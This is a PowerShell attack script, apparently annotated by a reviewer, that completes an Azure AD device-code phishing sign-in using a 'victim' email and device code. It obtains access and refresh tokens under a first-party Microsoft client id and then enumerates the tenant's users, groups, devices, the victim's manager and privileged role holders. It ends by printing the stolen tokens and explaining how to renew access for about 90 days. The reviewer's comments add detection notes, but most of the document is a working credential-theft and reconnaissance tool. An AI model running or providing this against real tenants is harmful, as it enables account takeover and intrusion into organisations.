<# STEPS TO RUN
1. Copy ADCEnum.ps1 to TokenTactics directory
2. Install-Module AzureAD
3. Ensure script is updated with victim EMAIL & DEVICE_CODE
4. Save console output to a file by running the command: Start-Transcript -Path C:\Temp\
5. EXECUTE SCRIPT: .\ADCEnum.ps1
6. Stop-Transcript
#>
<#
Review summary of what the script below does:
- Polls the Azure AD v1.0 token endpoint with a previously issued device code until the
  sign-in completes, then opens an AzureAD module session with the returned access token and
  performs read-only directory enumeration: users, groups, devices, the target user's group
  memberships / extension attributes / manager / owned devices and objects, and the members
  of every directory role.
- Prerequisites are not checked: TokenTactics.psd1 must be in the working directory and the
  AzureAD module must be installed, otherwise the Import-Module calls fail.
- The access and refresh tokens are written to the console at the end, so a transcript
  started as in step 4 contains live bearer credentials in clear text.
- On the tenant side this appears as a device-code-flow sign-in for the client_id in $body,
  followed by a burst of directory reads under that token; Conditional Access can restrict
  the device code flow, and the AzureAD module itself is deprecated by Microsoft in favour of
  Microsoft Graph PowerShell.
#>
Write-Warning "[!] Ensure 'Start-Transcript -Path <...>' is executed. Run 'Stop-Transcript' after execution completes."
Write-Warning "[!] Ensure TokenTactics is present in the same directory"
Write-Warning "[!] Ensure script is updated with victim EMAIL & DEVICE_CODE"
<#
---------------------------------------------
Content of ADCEnum script begins:
---------------------------------------------
#>
# MODIFY EMAIL & DEVICE_CODE HERE
# $email is both the AccountId passed to Connect-AzureAD and the user whose directory objects
# are enumerated later; $victim_device_code is sent as the "code" field of the token request.
$email = "<ENTER VICTIM EMAIL ID>"
$victim_device_code = "<ENTER VICTIM's DEVICE_CODE>"
# Poll-loop state. NOTE(review): $interval and $expires are string literals and $total is
# never initialised, so "$total += $interval" builds a string ("5", "55", "555", ...) and the
# "-gt" check in the loop compares strings rather than seconds -- confirm whether the timeout
# branch is ever reached.
$continue = $true
$interval = "5"
$expires = "900"
Start-Sleep -Seconds 2
Write-Host "[+] Importing TokenTactics"
# Relative path: the script must be run from the TokenTactics directory (step 1 above).
Import-Module .\TokenTactics.psd1
Write-Host "[+] Importing Azure AD"
Import-Module AzureAD
Write-Host "=====================================================================================================`n`n"
# Create body for authentication requests: OAuth 2.0 device-code grant against the v1.0
# endpoint, requesting a token for the Microsoft Graph resource. The client_id is a
# first-party Microsoft application id, so sign-in logs attribute the session to that
# application rather than to this script.
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
"code" = $victim_device_code
"resource" = "https://graph.microsoft.com"
}
# Loop while authorisation is pending or until timeout exceeded
while($continue)
{
Start-Sleep -Seconds $interval
$total += $interval
if($total -gt $expires)
{
Write-Error "Timeout occurred"
# "return" at script scope ends the script; no tokens were obtained.
return
}
# Try to get the response. Will give 40x while pending so we need to try&catch
try
{
# NOTE(review): the Uri literal ends with a space before the closing quote; left untouched
# here, but worth confirming the endpoint tolerates it.
$response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0 " -Body $body -ErrorAction SilentlyContinue
}
catch
{
# This is normal flow, always returns 40x unless successful.
# The error body is JSON; only "authorization_pending" keeps polling, any other error code
# (for example an expired or declined code) ends the script via the branch below.
$details=$_.ErrorDetails.Message | ConvertFrom-Json
$continue = $details.error -eq "authorization_pending"
Write-Host $details.error
if(!$continue)
{
# Not pending so this is a real error
Write-Error $details.error_description
return
}
}
# If we got response, all okay! ($response is only assigned when the POST succeeded, so it
# stays empty on every pending iteration.)
if($response)
{
Write-Host "[+] Tokens received! Authenticated to Azure AD as $email"
break # Exit the loop
}
}
# Open the AzureAD module session from the bearer token. $email is only the AccountId hint;
# the token itself determines which identity the session acts as.
$connection = Connect-AzureAD -AadAccessToken $response.access_token -AccountId $email
Write-Output $connection
Write-Host "[+] Initiating Domain Enumeration"
#User enumeration (first 10 only; the tenant-wide -All queries are commented out)
Write-Host "`n[+] Extracting AD Users"
#$allusers = Get-AzureADUser -All $true
#Write-Host "`n[+] $allusers.Count users found"
Write-Host "`nDisplaying user information - Limiting to 10`n"
Get-AzureADUser -Top 10 | Select DisplayName, UserPrincipalName, UserType
#Group Enumeration (first 10 only)
Write-Host "=====================================================================================================`n`n[+] Extracting AD Groups"
#$allgroups = Get-AzureADGroup -All $true
#Write-Host "`n[+] " + $allgroups.Count + " groups found"
Write-Host "`nDisplaying group information - Limiting to 10"
Get-AzureADGroup -Top 10 | Select DisplayName, Description
#Device Enumeration (first 10 only)
Write-Host "=====================================================================================================`n`n[+] Extracting registered devices"
#$alldevices = Get-AzureADDevice -All $true
#Write-Host "`n[+] " + $alldevices.Count + " devices found"
Write-Host "Displaying device names - Limiting to 10"
Get-AzureADDevice -Top 10 | Select DisplayName
#Targeted User Enumeration: everything below keys off the ObjectId of $email
Write-Host "==========================================================================================================================================================================================================`n[+] Initiating targetted user enumeration"
#Display user's groups
Write-Host "=====================================================================================================`n`n[+] Identifying user's group memberships"
$objectid = (Get-AzureADUser -ObjectId $email).ObjectId
Get-AzureADUserMembership -ObjectId $objectid | Select DisplayName, Description
#Display user's extension
Write-Host "=====================================================================================================`n`n[+] Identifying user's extension"
Get-AzureADUserExtension -ObjectId $objectid
#Display User's manager (the selected properties describe the manager object, not $email)
Write-Host "=====================================================================================================`n`n[+] Identifying security products in target environment, user's manager, Company details"
Get-AzureADUserManager -ObjectId $objectid | Select AssignedPlans, PhysicalDeliveryOfficeName, City, Country,PostalCode,CompanyName, Department, DisplayName, JobTitle,UserPrincipalName,Mail, MailNickName, Mobile, OnPremisesSecurityIdentifier
#Registered Device Name
Write-Host "=====================================================================================================`n`n[+] Identifying user's device name"
Get-AzureADUserOwnedDevice -ObjectId $objectid | Select DeviceId, DisplayName
#Display owned objects
Write-Host "=====================================================================================================`n`n[+] Identifying objects owned by user"
Get-AzureADUserOwnedObject -ObjectId $objectid | Select ObjectType,Description,Mail
#Privileged User Enumeration: emits one PSCustomObject per (role, member) pair to the pipeline
Write-Host "=====================================================================================================`n`n[+] Identifying users with privileged roles"
Get-AzureADDirectoryRole | Foreach-Object {
$Role = $_
$RoleMembers = Get-AzureADDirectoryRoleMember -ObjectId $Role.ObjectID
ForEach ($Member in $RoleMembers){
$RoleMembership = [PSCustomObject]@{
MemberName = $Member.DisplayName
MemberID = $Member.ObjectID
MemberOnPremID = $Member.OnPremisesSecurityIdentifier
MemberUPN = $Member.UserPrincipalName
MemberType = $Member.ObjectType
RoleID = $Role.RoleTemplateID
# NOTE(review): this re-lists every directory role for every member to look up a name that
# $Role already carries as DisplayName, and "Select DisplayName" yields an object with a
# DisplayName property rather than a plain string.
RoleName = Get-AzureADDirectoryRole | ?{$_.RoleTemplateId -eq $Role.RoleTemplateID} | Select DisplayName
}
$RoleMembership
}
}
# NOTE(review): presumably only the last $RoleMembership object is still in scope here, and
# it was already emitted inside the loop, so this prints at most one duplicate entry.
Write-Host $RoleMembership
Write-Host "`n`n[+] Access Token: "
# Both tokens are printed in clear text; they also land in any active transcript.
Write-Host $response.access_token
Write-Host "`n[+] Refresh Token: "
Write-Host $response.refresh_token
# NOTE(review): this is a double-quoted string, so $refresh_token, $GraphToken and $email are
# expanded when printed; the first two are not defined in this script and print as empty, so
# the example commands in the hint lose their placeholders.
Write-Host "`nAccess Token valid for about 60 minutes.`nIf expired, use the Refresh Token to renew access tokens. (Valid for over 90 days)`nRefreshTo-GraphToken -domain <Domain> -refreshToken $refresh_token`nConnect-AzureAD -AadAccessToken $GraphToken.access_token -AccountId $email"
Write-Host "`n`n======== To better visualize enumerated information, import data into AzureHound ======="